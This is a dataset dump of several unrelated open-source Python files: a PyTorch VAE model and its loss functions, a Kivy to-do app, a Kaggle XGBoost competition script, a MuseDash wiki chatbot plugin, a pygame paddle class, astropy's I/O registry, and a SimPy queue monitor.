*lin_decoding_layers[:last_decoding_layer_idx])\n self._mu_x = torch.nn.Sequential(*lin_decoding_layers[last_decoding_layer_idx:])\n if not self._flatten_input:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(lin_layer_upsizes[len(n_linear_layers)-1],\n self._feature_dims),\n torch.nn.Tanh()\n )\n else:\n self._logvar_x = torch.nn.Sequential(\n torch.nn.Linear(lin_layer_upsizes[len(n_linear_layers)-1],\n tuple_product(self._feature_dims)),\n torch.nn.Tanh(),\n ReshapeView(self._feature_dims)\n )\n\n\n def reparametrize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n\n def encode(self, x):\n m, l = self.encode_(x)\n if self.training and self._distributive_latent:\n latent = self.reparametrize(m, l)\n elif self._distributive_latent and not self._output_mu:\n latent = self.reparametrize(m, l)\n else:\n latent = m\n return latent\n \n def encode_(self, x):\n x = self._conv_encoder(x)\n x = self._lin_encoder(x)\n mu = self._mu_latent(x)\n logvar = self._logvar_latent(x)\n return mu, logvar\n\n def decode_(self, x):\n x = self._lin_decoder(x)\n x = self._conv_decoder(x)\n mu = self._mu_x(x)\n logvar = self._logvar_x(x)\n return mu, logvar\n\n def forward(self, x):\n mu_latent, logvar_latent = self.encode_(x)\n if self.training and self._distributive_latent:\n latent = self.reparametrize(mu_latent, logvar_latent)\n elif self._distributive_latent and not self._output_mu:\n latent = self.reparametrize(mu_latent, logvar_latent)\n else:\n latent = mu_latent\n\n mu_x, logvar_x = self.decode_(latent)\n if self.training and self._distributive_recon:\n x_out = self.reparametrize(mu_x, logvar_x)\n elif self._distributive_latent and not self._output_mu:\n x_out = self.reparametrize(mu_x, logvar_x)\n else:\n x_out = mu_x\n \n return x_out, {\"mu_latent\" : mu_latent, \"logvar_latent\" : logvar_latent,\n \"mu_x\" : mu_x, \"logvar_x\" : logvar_x}\n\n def add_variational_latent(self, size, lock=False):\n pass\n\n\n\ndef kld(mu, logvar):\n kld = -0.5 * torch.sum(1 + logvar\n - mu.pow(2)\n - logvar.exp(), axis=1)\n return kld\n\n\ndef vae_loss(recon_x, tru_x, beta=1, **kwargs):\n # full vae loss for modeling a distributive latent space\n # AND a distributive reconstruction\n # correct formulation here:\n mu_latent = kwargs[\"mu_latent\"]\n logvar_latent = kwargs[\"logvar_latent\"]\n mu_x = kwargs[\"mu_x\"]\n logvar_x = kwargs[\"logvar_x\"]\n\n loss_rec = -torch.sum(\n (-0.5 * torch.log2(TORCH_PI.to(mu_x.device)*2))\n + (-0.5 * logvar_x)\n + ((-0.5 / torch.exp(logvar_x))\n * (tru_x - mu_x) ** 2.0),\n axis=1\n )\n\n KLD = beta * kld(mu_latent, logvar_latent)\n loss = torch.mean(loss_rec + KLD, dim=0)\n return loss\n\ndef vae_loss_cnguyen(recon_x, tru_x, beta=1, **kwargs):\n # full vae loss for modeling a distributive latent space\n # AND a reconstruction with a simple error estimate.\n # https://cnguyen10.github.io/2020/11/24/vae-normalizing-constant-matters.html\n pass\n\ndef naive_vae_loss(recon_x, tru_x, beta=1, **kwargs):\n mu_latent = kwargs[\"mu_latent\"]\n logvar_latent = kwargs[\"logvar_latent\"]\n mu_x = kwargs[\"mu_x\"]\n logvar_x = kwargs[\"logvar_x\"]\n\n loss_rec = F.mse_loss(mu_x, tru_x, reduction='mean')\n\n KLD = beta * kld(mu_latent, logvar_latent)\n loss = torch.mean(loss_rec + KLD, dim=0)\n return loss\n\ndef cont_bernoulli_vae_loss(recon_x, tru_x, beta=1, **kwargs):\n # vae loss for continouus [0,1]-variables\n pass\n\ndef plain_mse(recon_x, tru_x, **kwargs):\n loss_rec = F.mse_loss(recon_x, tru_x, reduction='mean')\n return loss_rec\n\ndef ortho_loss(recon_x, tru_x, **kwargs):\n latent = kwargs[\"latent\"]\n \n","repo_name":"flxmr-tum/sne_materials_surrogate","sub_path":"torch_tools/pytorch_models/simple_aes.py","file_name":"simple_aes.py","file_ext":"py","file_size_in_byte":21652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27171102224","text":"\nimport json\nperson = '{\"c\": 310.13, \"h\": 310.29, \"l\": 304.29, \"o\": 305.64, \"pc\": 303.74, \"t\": 1589083003}'\nperson_dict = json.loads(person)\n\n# Output: {'name': 'Bob', 'languages': ['English', 'Fench']}\nprint(person_dict)\n\n# Output: ['English', 'French']\nprint(person_dict['l'])\n","repo_name":"cartha353/Playground","sub_path":"TestPrograms/python/jsonparsing.py","file_name":"jsonparsing.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71292006243","text":"from kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.listview import ListItemButton\nfrom kivy.core.window import Window\nfrom kivy.properties import StringProperty\nfrom kivy.clock import Clock\n\nfrom datetime import datetime, timedelta\n\nWindow.size = (500, 400)\n\nclass ToDoListItem(BoxLayout):\n btn_text = StringProperty()\n timer_text = StringProperty()\n elapsed = 0\n\n def update(self, dt):\n\n sec = timedelta(self.elapsed)\n d = datetime(1, 1, 1) + sec\n\n time_str = \"%02d:%02d:%02d:%02d\" % (d.second, d.minute, d.hour, d.day - 1)\n self.timer_text = time_str\n self.elapsed+=1\n\n def onClick(self):\n event = Clock.schedule_interval(self.update, 1)\n #event_trig = Clock.create_trigger(self.update, 1)\n if self.btn_text == \"Start\":\n self.btn_text = \"Stop\"\n #event_trig()\n else:\n self.btn_text = \"Start\"\n event.cancel()\n\nclass ToDoLayout(BoxLayout):\n\n def sort(self):\n self.rv.data = sorted(self.rv.data, key=lambda x: x['value'])\n\n def clear(self):\n self.rv.data = []\n\n def insert(self, value):\n self.rv.data.insert(0, {'item_text': value or 'default value'})\n\n def update(self, value):\n if self.rv.data:\n self.rv.data[0]['value'] = value or 'default new value'\n self.rv.refresh_from_data()\n\n def remove(self):\n if self.rv.data:\n self.rv.data.pop(0)\n\nclass ToDoApp(App):\n def build(self):\n return ToDoLayout()\n\ntd = ToDoApp()\ntd.run()","repo_name":"caiyzik/todolist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2530616205","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport xgboost as xgb\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.cross_validation import cross_val_score\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.feature_selection import SelectFromModel, VarianceThreshold\nimport xgboost as xgb\nfrom sklearn.cross_validation import KFold\nfrom sklearn.linear_model import LogisticRegression\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nfrom subprocess import check_output\nprint(check_output([\"ls\", \"../input\"]).decode(\"utf8\"))\n\n# Any results you write to the current directory are saved as output.\n\nprint('Load data...')\ntrain = pd.read_csv(\"../input/train.csv\")\ntrain_id = train['ID'].values\ntarget = train['TARGET'].values\ntrain = train.drop(['ID','TARGET'],axis=1)\n\ntest = pd.read_csv(\"../input/test.csv\")\ntest_id = test['ID'].values\ntest = test.drop(['ID'],axis=1)\n\n#removing outliers\ntrain = train.replace(-999999,2)\ntest = test.replace(-999999,2)\n\n# adding zero counts\n\ntrain[\"zeroes\"] = (train == 0).astype(int).sum(axis=1)\ntest[\"zeroes\"] = (test == 0).astype(int).sum(axis=1)\n\n# remove constant columns (std = 0)\nremove = []\nfor col in train.columns:\n if train[col].std() == 0:\n remove.append(col)\n\ntrain.drop(remove, axis=1, inplace=True)\ntest.drop(remove, axis=1, inplace=True)\n\nprint(train.shape, test.shape)\n\n# remove duplicated columns\nremove = []\ncols = train.columns\nfor i in range(len(cols)-1):\n v = train[cols[i]].values\n for j in range(i+1,len(cols)):\n if np.array_equal(v,train[cols[j]].values):\n remove.append(cols[j])\n\ntrain.drop(remove, axis=1, inplace=True)\ntest.drop(remove, axis=1, inplace=True)\n\n\n# Feature selection \n#ROUND ONE\nCols = train.columns.values.tolist()\nclf = GradientBoostingClassifier(random_state=1729)\nselector = clf.fit(train, target)\nimportances = selector.feature_importances_\nfs = SelectFromModel(selector, prefit=True)\ntrain = fs.transform(train)\ntest = fs.transform(test)\nprint(train.shape, test.shape)\n\nselectedCols = train.shape[1]\nsortedCols = [col for importance, col in sorted(zip(importances, Cols))]\nsortedCols = sortedCols[0:selectedCols]\ntrain = pd.DataFrame(train)\ntest = pd.DataFrame(test)\ntrain.columns = sortedCols\ntest.columns = sortedCols\n\n#Selecting Percentile Changes from feature to feature\n\nfor i in range(len(sortedCols)):\n\tfor j in range(len(sortedCols)):\n\t\tcolName = sortedCols[i]+\"_SUBTRACT_\"+sortedCols[j]+\"DIVIDE\"+sortedCols[i]\n\t\ttrain[colName] = (train[sortedCols[i]]-train[sortedCols[j]])/train[sortedCols[i]]\n\t\ttest[colName] = (test[sortedCols[i]]-test[sortedCols[j]])/test[sortedCols[i]]\n\ntrain = train.replace(np.inf, 999999)\ntrain = train.replace(-np.inf, -999999)\ntrain = train.replace(np.nan, -1)\ntest = test.replace(np.inf, 999999)\ntest = test.replace(-np.inf, -999999)\ntest = test.replace(np.nan, -1)\n\n#ROUND TWO\nCols = train.columns.values.tolist()\nclf = GradientBoostingClassifier(random_state=1729)\nselector = clf.fit(train, target)\nimportances = selector.feature_importances_\nfs = SelectFromModel(selector, prefit=True)\ntrain = fs.transform(train)\ntest = fs.transform(test)\nprint(train.shape, test.shape)\n\nselectedCols = train.shape[1]\nsortedCols = [col for importance, col in sorted(zip(importances, Cols))]\nsortedCols = sortedCols[0:selectedCols]\nprint(sortedCols)\n\npredictedResult = np.zeros(train.shape[0])\nkf = KFold(train.shape[0], n_folds=10)\ntestPred = []\nfor trainIndex, testIndex in kf:\n trainFold, testFold = train[trainIndex], train[testIndex]\n trainFoldTarget, testFoldTarget = target[trainIndex], target[testIndex]\n xgbc = xgb.XGBClassifier(n_estimators = 560,learning_rate = 0.0202047,max_depth = 5,subsample = 0.6815,colsample_bytree = 0.701)\n xgbc.fit(trainFold,trainFoldTarget)\n xgbpred =xgbc.predict_proba(testFold)[:,1]\n testPred.append(xgbc.predict_proba(test)[:,1])\n predictedResult[testIndex] = xgbpred\n print(roc_auc_score(testFoldTarget, xgbpred))\n\nprint(roc_auc_score(target, predictedResult))\ntestPred = np.average(np.array(testPred), axis =0)\npd.DataFrame({\"ID\": test_id, \"TARGET\": testPred}).to_csv('submission.csv',index=False)","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/santander-customer-satisfaction/pip install kaggle/14th-place-private-lb-script.py","file_name":"14th-place-private-lb-script.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"6269326158","text":"# -*- coding: utf-8 -*-\nfrom time import time\nimport requests, asyncio, os, time, random\nfrom datetime import datetime\nimport pytz\nimport hoshino\nfrom hoshino import Service, priv, aiorequests, R\nfrom hoshino.typing import CQEvent, MessageSegment\nfrom hoshino.util import FreqLimiter, escape, DailyNumberLimiter\nfrom operator import __iadd__\n\nfrom . import _chip_data, _song_data\n\ntz = pytz.timezone('Asia/Shanghai')\n\n_max = 1\n_nlmt = DailyNumberLimiter(_max)\n\n\nWiki_Menu_Character_img = R.img(f\"musewiki/etc/muses.png\").cqcode\nWiki_Menu_Chip_img = R.img(f\"musewiki/etc/eflins.png\").cqcode\n\ntips_tuple = _song_data.Muse_Tips\n\nsv_help = '''\n ※MuseDash百科※\n当前菜单有以下内容:\n -角色&精灵查询-\n- [查询角色] 查询游戏内角色\n- [查询精灵] 查询游戏内精灵\n\n或发送以下指令进入其它菜单:\n- [帮助百科资料查询]\n- [帮助百科插图查询]\n- [帮助百科成就查询]\n- [帮助百科语音查询]\n- [帮助帮助md百科]\n- [帮助百科歌曲推送]\n- [帮助百科运势]\n'''.strip()\n\nsv = Service(\n name = 'MuseDash百��-角色查询', #功能名\n use_priv = priv.NORMAL, #使用权限 \n manage_priv = priv.ADMIN, #管理权限\n visible = True, #False隐藏\n enable_on_default = True, #是否默认启用\n bundle = 'musedash', #属于哪一类\n help_ = sv_help #帮助文本\n )\n\ndef get_voice_character_menu():\n filename = 'ElfinsBgm.wav'\n voice_rec = R.get('record/musewiki/audioclip/', filename)\n return voice_rec\n\n@sv.on_fullmatch([\"帮助MuseDash百科-角色查询\", \"帮助百科角色查询\"])\nasync def bangzhu_musewiki_chip(bot, ev) -> MessageSegment:\n file = get_voice_character_menu()\n voice_rec = MessageSegment.record(f'file:///{os.path.abspath(file.path)}')\n uid = ev['user_id']\n now_hour=datetime.now(tz).hour\n if 0<=now_hour<6: #凌晨\n tips = random.choice(tips_tuple)\n greetings = '(。・∀・)ノ゙凌晨好!'\n await bot.send(ev, greetings + tips)\n elif 8<=now_hour<12: #上午\n tips = random.choice(tips_tuple)\n greetings = '(((o(*゚▽゚*)o)))上午好!'\n await bot.send(ev, greetings + tips)\n elif 12<=now_hour<14: #中午\n tips = random.choice(tips_tuple)\n greetings = '(o゜▽゜)o☆中午好!'\n await bot.send(ev, greetings + tips)\n elif 14<=now_hour<18: #下午\n tips = random.choice(tips_tuple)\n greetings = 'o(^▽^)o下午好!'\n await bot.send(ev, greetings + tips)\n elif 18<=now_hour<21: #晚上\n tips = random.choice(tips_tuple)\n greetings = '♪(´∇`*)晚上好!'\n await bot.send(ev, greetings + tips)\n elif 21<=now_hour<24: #深夜\n tips = random.choice(tips_tuple)\n greetings = '✧(≖ ◡ ≖✿)深夜好!'\n if not _nlmt.check(uid):\n await bot.send(ev, f\"欢迎继续使用MuseDash百科-角色查询!\")\n else:\n await bot.send(ev, voice_rec)\n _nlmt.increase(uid)\n\n final_output = Wiki_Menu_Character_img + sv_help\n await bot.send(ev, final_output)\n\n# No.: [name, description, skill, chipname, chipdescription]\nasync def get_chip_info_from_chip(chip):\n chip_data = _chip_data.CHIP_DATA[chip]\n Name = chip_data[0] #获取精灵名称\n DESCRIPTION = chip_data[1] #获取精灵描述\n SKILL = chip_data[2] #获取技能\n CHIPNAME = chip_data[3] #获取信物\n CHIPDESCRIPTION = chip_data[4] #获取信物描述\n\n chippic = R.img(f\"musewiki/chip/chip_pic/{Name}.png\").cqcode\n chipgood = R.img(f\"musewiki/chip/chip_goods/{CHIPNAME}.png\").cqcode\n\n chip_image_cover = str(chippic)\n chip_goods_image = str(chipgood)\n\n chip_info_1 = f\"精灵名:{Name}\\n精灵描述:{DESCRIPTION}\\n技能:{SKILL}\\n\"\n chip_info_2 = f\"信物:{CHIPNAME}\\n信物描述:{CHIPDESCRIPTION}\"\n\n return chip_info_1, chip_image_cover, chip_info_2, chip_goods_image, chip_data\n\ndef keyword_search_chip(keyword):\n chip_dict = _chip_data.CHIP_DATA\n result = []\n for chip in chip_dict:\n if keyword in chip_dict[chip][0] or keyword in chip:\n result.append(chip)\n return result\n\n@sv.on_prefix(('查询精灵'))\nasync def muse_wiki_chip(bot, ev: CQEvent):\n show_chips = str(Wiki_Menu_Chip_img)\n s = ev.message.extract_plain_text()\n if not s:\n await bot.send(ev, \"请发送[查询精灵 精灵名]~\\n精灵名需要完整匹配\", at_sender=True)\n return\n if s:\n available_chips = keyword_search_chip(s)\n if not available_chips:\n await bot.send(ev, f'未找到含有关键词\"{s}\"的精灵...')\n return\n elif len(available_chips) > 1:\n msg_part = '\\n'.join(['• ' + chip for chip in available_chips])\n await bot.send(ev, f'从资料库中找到了这些:\\n{msg_part}\\n您想找的是什么呢~')\n return\n else:\n chip_info_1, chip_image_cover, chip_info_2, chip_goods_image, chip_data = await get_chip_info_from_chip(available_chips[0])\n\n final_msg = show_chips + '\\n' + chip_image_cover + chip_info_1 + chip_goods_image + chip_info_2 #合成单条消息\n await bot.send(ev, final_msg)\n\n# Name: [cosName, character, HP, description, skill, chipName, chipDescription, cv]\nasync def get_chara_info_from_chara(chara):\n chara_data = _chip_data.CHARA_DATA[chara]\n cosName = chara_data[0] #获取皮肤名称\n character = chara_data[1] #获取角色名\n HP = chara_data[2] #获取血量\n description = chara_data[3] #获取描述\n skill = chara_data[4] #获取技能\n charaName =chara_data[5] #获取信物\n chipDescription =chara_data[6] #获取信物描述\n cv =chara_data[7] #获取声优\n\n charapic = R.img(f\"musewiki/chip/chara_pic/{cosName}.png\").cqcode\n charagood = R.img(f\"musewiki/chip/chara_goods/{charaName}.png\").cqcode\n chara_bgm = f'[CQ:record,file=file:///C:/Resources/record/musewiki/角色语音/bgm/{cosName}.wav]'\n\n chara_image = str(charapic)\n chara_goods_image = str(charagood)\n\n \n\n chara_info_1 = f\"角色名:{cosName}{character}\\n初始血量:{HP}\\n角色描述:{description}\\n技能: {skill}\\n\"\n chara_info_2 = f\"信物:{charaName}\\n信物描述:{chipDescription}\\n声优: {cv}\"\n\n return chara_info_1, chara_image, chara_info_2, chara_goods_image, chara_data, chara_bgm\n\ndef keyword_search_chara(keyword):\n chara_dict = _chip_data.CHARA_DATA\n result = []\n for chara in chara_dict:\n if keyword in chara or keyword in chara_dict[chara][0]:\n result.append(chara)\n return result\n\n@sv.on_prefix(('查询角色'))\nasync def muse_wiki_chara(bot, ev: CQEvent):\n s = ev.message.extract_plain_text()\n if not s:\n await bot.send(ev, \"不告诉我名字要怎么查询啦!\")\n return\n if s:\n available_charas = keyword_search_chara(s)\n if not available_charas:\n await bot.send(ev, f'没有找到叫\"{s}\"的角色哦')\n return\n elif len(available_charas) > 1:\n msg_part = '\\n'.join(['• ' + chara for chara in available_charas])\n await bot.send(ev, f'好像有很多相似的名字哦~:\\n{msg_part}\\n您想找的是谁呢~')\n return\n else:\n chara_info_1, chara_image, chara_info_2, chara_goods_image, chara_data, chara_bgm = await get_chara_info_from_chara(available_charas[0])\n\n final_msg = chara_image + chara_info_1 + chara_goods_image + chara_info_2 #合成单条消息\n await bot.send(ev, final_msg)\n await bot.send(ev, chara_bgm)","repo_name":"Soung2279/haru-bot-setup","sub_path":"hoshino/modules/musedash/musewiki_character.py","file_name":"musewiki_character.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"} +{"seq_id":"72999008483","text":"import pygame\n\n\nclass Bar:\n def __init__(self):\n self.x = 600\n self.y = 700\n self.width = 100\n self.height = 30\n self.vel = 30\n self.color = (225, 0, 0)\n self.moving_right = False\n self.moving_left = False\n\n def draw_bar(self, screen):\n pygame.draw.rect(screen, self.color, (self.x, self.y, self.width, self.height))\n\n def update_bar(self, screen_width):\n if self.moving_right and self.x < screen_width - self.width:\n self.x += self.vel\n elif self.moving_left and self.x > 0:\n self.x -= self.vel\n","repo_name":"FruitPunchSamurai1961/Breakout_Game","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16874142806","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nimport io\nimport sys\n\nfrom ..utils import OrderedDict\n\n__all__ = ['register_reader', 'register_writer', 'register_identifier',\n 'identify_format', 'get_reader', 'get_writer', 'read', 'write']\n\n_readers = OrderedDict()\n_writers = OrderedDict()\n_identifiers = OrderedDict()\n\n\ndef register_reader(data_format, data_class, function, force=False):\n \"\"\"\n Register a reader function.\n\n Parameters\n ----------\n data_format : string\n The data type identifier. This is the string that will be used to\n specify the data type when reading.\n data_class : classobj\n The class of the object that the reader produces\n function : function\n The function to read in a data object.\n force : bool\n Whether to override any existing function if already present.\n \"\"\"\n\n if not (data_format, data_class) in _readers or force:\n _readers[(data_format, data_class)] = function\n else:\n raise Exception('Reader for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef register_writer(data_format, data_class, function, force=False):\n \"\"\"\n Register a table writer function.\n\n Parameters\n ----------\n data_format : string\n The data type identifier. This is the string that will be used to\n specify the data type when writing.\n data_class : classobj\n The class of the object that can be written\n function : function\n The function to write out a data object.\n force : bool\n Whether to override any existing function if already present.\n \"\"\"\n\n if not (data_format, data_class) in _writers or force:\n _writers[(data_format, data_class)] = function\n else:\n raise Exception('Writer for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef register_identifier(data_format, data_class, identifier, force=False):\n \"\"\"\n Associate an identifier function with a specific data type.\n\n Parameters\n ----------\n data_format : str\n The data type identifier. This is the string that is used to\n specify the data type when reading/writing.\n data_class : classobj\n The class of the object that can be written\n identifier : function\n A function that checks the argument specified to `read` or `write` to\n determine whether the input can be interpreted as a table of type\n `data_format`. This function should take the following arguments:\n\n - `origin`: A string `read` or `write` identifying whether\n the file is to be opened for reading or writing.\n - `path`: The path to the file.\n - `fileobj`: An open file object to read the file's contents, or\n `None` if the file could not be opened.\n - `*args`: A list of positional arguments to the `read` or\n `write` function.\n - `**kwargs`: A list of keyword arguments to the `read` or\n `write` function.\n\n One or both of `path` or `fileobj` may be `None`. If they are\n both `None`, the identifier will need to work from `args[0]`.\n\n The function should return True if the input can be identified\n as being of format `data_format`, and False otherwise.\n force : bool\n Whether to override any existing function if already present.\n\n Examples\n --------\n\n To set the identifier based on extensions, for formats that take a\n filename as a first argument, you can do for example::\n\n >>> def my_identifier(*args, **kwargs):\n ... return (isinstance(args[0], basestring) and\n ... args[0].endswith('.tbl'))\n >>> register_identifier('ipac', Table, my_identifier)\n \"\"\"\n\n if not (data_format, data_class) in _identifiers or force:\n _identifiers[(data_format, data_class)] = identifier\n else:\n raise Exception('Identifier for format {0!r} and class {1!r} is '\n 'already defined'.format(data_format,\n data_class.__name__))\n\n\ndef identify_format(origin, data_class_required, path, fileobj, args, kwargs):\n # Loop through identifiers to see which formats match\n valid_formats = []\n for data_format, data_class in _identifiers:\n if data_class is data_class_required:\n if _identifiers[(data_format, data_class)](\n origin, path, fileobj, *args, **kwargs):\n valid_formats.append(data_format)\n\n return valid_formats\n\n\ndef get_reader(data_format, data_class):\n if (data_format, data_class) in _readers:\n return _readers[(data_format, data_class)]\n else:\n raise Exception('No reader defined for format {0!r} and class '\n '{1!r}'.format(data_format, data_class.__name__))\n\n\ndef get_writer(data_format, data_class):\n if (data_format, data_class) in _writers:\n return _writers[(data_format, data_class)]\n else:\n raise Exception('No writer defined for format {0!r} and class '\n '{1!r}'.format(data_format, data_class.__name__))\n\n\ndef read(cls, *args, **kwargs):\n \"\"\"\n Read in data\n\n The arguments passed to this method depend on the format\n \"\"\"\n\n if 'format' in kwargs:\n format = kwargs.pop('format')\n else:\n format = None\n\n ctx = None\n try:\n if format is None:\n path = None\n fileobj = None\n\n if len(args):\n if isinstance(args[0], basestring):\n from ..utils.data import get_readable_fileobj\n path = args[0]\n try:\n ctx = get_readable_fileobj(args[0], encoding='binary')\n fileobj = ctx.__enter__()\n except Exception as e:\n fileobj = None\n else:\n args = [fileobj] + list(args[1:])\n elif hasattr(args[0], 'read'):\n path = None\n fileobj = args[0]\n\n format = _get_valid_format(\n 'read', cls, path, fileobj, args, kwargs)\n\n reader = get_reader(format, cls)\n table = reader(*args, **kwargs)\n\n if not isinstance(table, cls):\n raise TypeError(\n \"reader should return a {0} instance\".format(cls.__name__))\n finally:\n if ctx is not None:\n ctx.__exit__(*sys.exc_info())\n\n return table\n\n\ndef write(data, *args, **kwargs):\n \"\"\"\n Write out data\n\n The arguments passed to this method depend on the format\n \"\"\"\n\n if 'format' in kwargs:\n format = kwargs.pop('format')\n else:\n format = None\n\n if format is None:\n path = None\n fileobj = None\n if len(args):\n if isinstance(args[0], basestring):\n path = args[0]\n fileobj = None\n elif hasattr(args[0], 'read'):\n path = None\n fileobj = args[0]\n\n format = _get_valid_format(\n 'write', data.__class__, path, fileobj, args, kwargs)\n\n writer = get_writer(format, data.__class__)\n writer(data, *args, **kwargs)\n\n\ndef _get_valid_format(mode, cls, path, fileobj, args, kwargs):\n \"\"\"\n Returns the first valid format that can be used to read/write the data in\n question. Mode can be either 'read' or 'write'.\n \"\"\"\n\n if mode == 'read':\n funcs = _readers\n elif mode == 'write':\n funcs = _writers\n\n valid_formats = identify_format(mode, cls, path, fileobj, args, kwargs)\n\n if len(valid_formats) == 0:\n raise Exception(\n \"Format could not be identified. \",\n \"Valid formats are {0}\".format(\n ', '.join(sorted(x[0] for x in funcs))))\n elif len(valid_formats) > 1:\n raise Exception(\n \"Format is ambiguous - options are: {0}\".format(\n ', '.join(sorted(valid_formats))))\n\n return valid_formats[0]\n","repo_name":"RayPlante/astropy","sub_path":"astropy/io/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":8255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"72323052000","text":"# The workaround I am currently using involves:\n# 1) Inheriting a new class from simpy.Store\n# 2) Patching _do_put and _do_get to include custom call backs\n# 3) Add tracking and reporting methods\n\nimport simpy\nfrom collections import defaultdict\n\n\n\ndef condense(queue):\n return {\n 'cumulative_item_rec': queue._cumulative_item_rec,\n 'cumulative_time_rec': queue._cumulative_time_rec,\n 'item_time_dict': queue._item_time_dict\n }\n\nclass QueueCount(object):\n def __init__(self, env, initial_count=0):\n self._env = env\n self.items = []\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.Store._do_put method override\n def add(self):\n self.items.append(1)\n self._update_tracking()\n\n # simpy.Store._do_get method override\n def remove(self):\n if self.items:\n self.items.pop(0)\n self._update_tracking()\n\n def reset_tracking(self):\n self._last_reset = self._env.now\n self._last_time = self._env.now\n self._weighted_items = 0.0\n\n self._item_rec = []\n self._time_rec = []\n self._item_time_dict = defaultdict(int)\n self._item_time_dict[self._last_value] = 0\n self._update_tracking()\n\n def _update_tracking(self):\n if self._env.now > self._last_time or len(self._item_rec) == 0:\n time_delta = self._env.now - self._last_time\n self._weighted_items += time_delta * float(self._last_value)\n self._item_rec.append(self._last_value)\n self._time_rec.append(time_delta)\n self._item_time_dict[self._last_value] += time_delta\n self._last_value = len(self.items)\n self._last_time = self._env.now\n if len(self._cumulative_item_rec) == 0:\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n if self._last_time != self._cumulative_time_rec[-1]:\n self._cumulative_item_rec.append(self._cumulative_item_rec[-1])\n self._cumulative_time_rec.append(self._last_time)\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n self._cumulative_item_rec.pop(-1)\n self._cumulative_item_rec.append(self._last_value)\n\n # def add(self):\n # self.update_tracking(self.count + 1)\n\n # def update_tracking(self, new_count):\n # delta_t = self.env.now - self.last_time\n # self.time_records[self.count] = self.time_records.get(self.count, 0) + delta_t\n\n # self.count = new_count\n # self.last_time = self.env.now\n\n # def remove(self):\n # self.update_tracking(self.count - 1)\n\n\nclass MonitoredStore(simpy.Store):\n def __init__(self, env, capacity=float('inf')):\n super(MonitoredStore, self).__init__(env, capacity)\n\n self._last_value = len(self.items)\n self._cumulative_item_rec = []\n self._cumulative_time_rec = []\n\n self.reset_tracking()\n\n # simpy.Store._do_put method override\n def _do_put(self, event):\n if len(self.items) < self._capacity:\n self.items.append(event.item)\n event.succeed()\n self._update_tracking()\n\n # simpy.Store._do_get method override\n def _do_get(self, event):\n if self.items:\n event.succeed(self.items.pop(0))\n self._update_tracking()\n\n def reset_tracking(self):\n self._last_reset = self._env.now\n self._last_time = self._env.now\n self._weighted_items = 0.0\n\n self._item_rec = []\n self._time_rec = []\n self._item_time_dict = defaultdict(int)\n self._item_time_dict[self._last_value] = 0\n self._update_tracking()\n\n def _update_tracking(self):\n if self._env.now > self._last_time or len(self._item_rec) == 0:\n time_delta = self._env.now - self._last_time\n self._weighted_items += time_delta * float(self._last_value)\n self._item_rec.append(self._last_value)\n self._time_rec.append(time_delta)\n self._item_time_dict[self._last_value] += time_delta\n self._last_value = len(self.items)\n self._last_time = self._env.now\n if len(self._cumulative_item_rec) == 0:\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n if self._last_time != self._cumulative_time_rec[-1]:\n self._cumulative_item_rec.append(self._cumulative_item_rec[-1])\n self._cumulative_time_rec.append(self._last_time)\n self._cumulative_item_rec.append(self._last_value)\n self._cumulative_time_rec.append(self._last_time)\n else:\n self._cumulative_item_rec.pop(-1)\n self._cumulative_item_rec.append(self._last_value)\n\n @property\n def avg_value(self):\n try:\n if self._env.now > self._time_rec[-1]:\n self._update_tracking()\n except Exception:\n self._update_tracking()\n\n time_delta = float(self._env.now - self._last_reset)\n if time_delta == 0:\n time_delta = 1\n\n return sum(x * y for (x, y) in zip(self._time_rec, self._item_rec)) / time_delta\n\n @property\n def time_series(self):\n self._update_tracking()\n string = 'Time\\tValue\\n'\n for time, value in zip(self._cumulative_time_rec, self._cumulative_item_rec):\n string += '%f\\t%d\\n' % (time, value)\n\n return string\n\n def print_stats(self):\n self._update_tracking()\n total = float(sum(list(self._item_time_dict.values())))\n if total == 0:\n total = 1\n avg = 0.0\n for index, key in enumerate(sorted(self._item_time_dict.keys())):\n print('%d -> %f%%' % (key, 100 * self._item_time_dict[key] / total))\n avg += key * self._item_time_dict[key] / total\n print('Weighted Avg: %f' % avg)\n 